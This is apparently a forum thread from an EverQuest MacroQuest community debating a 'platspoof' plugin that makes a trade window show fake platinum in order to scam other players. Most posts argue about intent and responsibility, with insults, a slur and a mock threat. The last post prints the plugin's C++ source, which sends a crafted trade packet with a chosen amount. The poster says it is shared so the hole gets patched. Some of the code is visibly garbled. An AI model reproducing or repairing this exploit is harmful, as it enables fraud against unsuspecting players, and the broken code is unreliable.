Plat Trade Dupe?

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Oh what it would be like in a world where drug sellers, illegal firearm suppliers, and nuclear weapon sellers are free from all responsibility.

Not a very lucrative one, considering the main reason for fueling a black market (e.g. legalization of marijuana).

I imagine it would be some Mad Max scenario possibly, definitely post-apocalyptic if such destruction agents were in the hands of malevolent persons. People make a living off such speculation.

There's supply and demand. Someone may have wanted such a plat spoofing plugin at one point, whether it was someone other than the author or the author himself. He wrote it to fulfill that demand.
guess what...let's talk about the last few plugins that he has released to the public, and what good they have done...

If they weren't all that great, I imagine his reputation is tarnished and anyone pursuing his plugins would be in for a surprise compromising themselves.
When people are of low moral character they do not care if they are associated with people of low moral character. the fact that who downloads and uses his plugins gives a cloak to hide under allows more to use it.
ok, the thing is...this plugin will not only be used to scam non mq users, but also anyone. when most plugins are made, thought is put into what the intent of the plugin is, so what is the intent of this plugin? There's more to this than just "use at your own risk" or "if you dont wanna get fucked don't use it". People will be exploited by this without even knowing what is going on, which is not a good standard for our community. yes, the people that use this will be caught, and banned, but use your fucking head. This isn't just bad for MQ users, it's bad for the game in general. We take so much shit from the NON mq user community, and you think this will make it any better? Most people don't give 2 shits if we use map features, but trust me this plat thing will cause more harm than good, and fuckstick was well aware of this when he made, and released it.

You emphasize on people and their personal responsibilities. One could even argue using MQ2 to someone who isn't is advantageous in the same sense. It isn't fair, but when was anyone trying to be at that point?
@ Blitz nice choosing to respond to things like oh if only selling drugs and yadda yadda and the post about discussing other plugins but completely ignore the sound post i put discussing the plugin on topic which is platspoof. did you have no rebuttal if so then you should acknowledge the fact that the sole intent of this is malicious and it hurts others possibly more than the user of it as the user may or may not get banned for using where people that have it used against them DEFFINATLY get scammed. Before you try to use the "fair" to non users card of mq get fuckin bent on that. Fair isn't what im talking about outright ripping some one off is a little bit different. and if you dont think so then let me know where you live so i may come steal your car you call it unfair and leave it out of the courts k. just pretend its all good you can just go "farm" the money to buy a new car so what you got ripped off out of one.
If they weren't all that great, I imagine his reputation is tarnished and anyone pursuing his plugins would be in for a surprise compromising themselves.

Thats the problem with this kind of product. You can build up a rep for putting out worthwhile things, and things go well. When things aren't going well, you can still use your rep to put out products that only harm the communitry, and people will use them because they trusted you in the past. again, look at fuckstick CC...why do you think people used his crap products? Cuz at the end of his money making, he used his rep as a way to try an sell products that only harm the user of them. His bullshit hung around the MMObugs community for much longer than should be, because of a rep. Millions of people bought Toyota's because they put out a great product. Now their products have flaws, and they relied on their rep to continue to sell...
Thats the problem with this kind of product. You can build up a rep for putting out worthwhile things, and things go well. When things aren't going well, you can still use your rep to put out products that only harm the communitry, and people will use them because they trusted you in the past. again, look at fuckstick CC...why do you think people used his crap products? Cuz at the end of his money making, he used his rep as a way to try an sell products that only harm the user of them. His bullshit hung around the MMObugs community for much longer than should be, because of a rep. Millions of people bought Toyota's because they put out a great product. Now their products have flaws, and they relied on their rep to continue to sell...

Sure we all develop trust, but ultimately whose responsibility is it. You make your own choice. Live with it. Learn from it.
nice trolling blitz ignore all the good ones and keep going on with one thing. " but ultimately whose responsibility is it" now i really do wish some one would steal your car and to put things to you in your own perspective i wish the insurance company would say " but ultimately whose responsibility is it" you should have had a better eye on your car. my opinion of you just dropped incredibly your a fucking dipshit in my book now.
@ Blitz nice choosing to respond to things like oh if only selling drugs and yadda yadda and the post about discussing other plugins but completely ignore the sound post i put discussing the plugin on topic which is platspoof. did you have no rebuttal if so then you should acknowledge the fact that the sole intent of this is malicious and it hurts others possibly more than the user of it as the user may or may not get banned for using where people that have it used against them DEFFINATLY get scammed. Before you try to use the "fair" to non users card of mq get fuckin bent on that. 1) Fair isn't what im talking about outright ripping some one off is a little bit different. and if you dont think so then 2) let me know where you live so i may come steal your car you call it unfair and leave it out of the courts k. just pretend its all good you can just go "farm" the money to buy a new car so what you got ripped off out of one.

1) That's life. Grow up and deal with it. There's a reason there is insurance. Risk anyone? Would be nice to live in an ideal world where everything is fine and dandy.

2) That makes you better how?
nice trolling blitz ignore all the good ones and keep going on with one thing. my opinion of you just dropped incredibly your a fucking dipshit in my book now.

Your affection towards a thread on a forum doesn't fair too well either in my impression of you. Keep feeding the troll, it hungers!
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The opcode might be wrong I didnt bother checking it, since I dont really keep it updated.

You will need a method to send packets just like was done in the alt currency dupe thread.

You all should post this on EQPlayers from junk station accounts so it can get nerfed.

#include "../MQ2Plugin.h"


typedef struct _Scammer
    unsigned long one;
    unsigned long two;
    unsigned long three;
    unsigned long four;
    unsigned long five;
} ScammerPkt;

void PlatSpoofCmd(PSPAWNINFO pChar, PCHAR szLine)
    char szArg[MAX_STRING] = {0};
    GetArg(szArg, szLine, 1);

    int iScam = atoi(szLine);

    ScammerPkt isforfags;   = 3;
    isforfags.two   = 3;
    isforfags.three = 3;
    isforfags.four  = 3;
    isforfags.five  = iScam;

    SendEQPacket(0x6024, &isforfags, sizeof(isforfags));

PLUGIN_API void InitializePlugin()
    AddCommand("/platspoof", PlatSpoofCmd);

PLUGIN_API void ShutdownPlugin()

This is posted so that it can get nerfed. If you use this you are a shitbag and deserve to have your nut sacks cut off.

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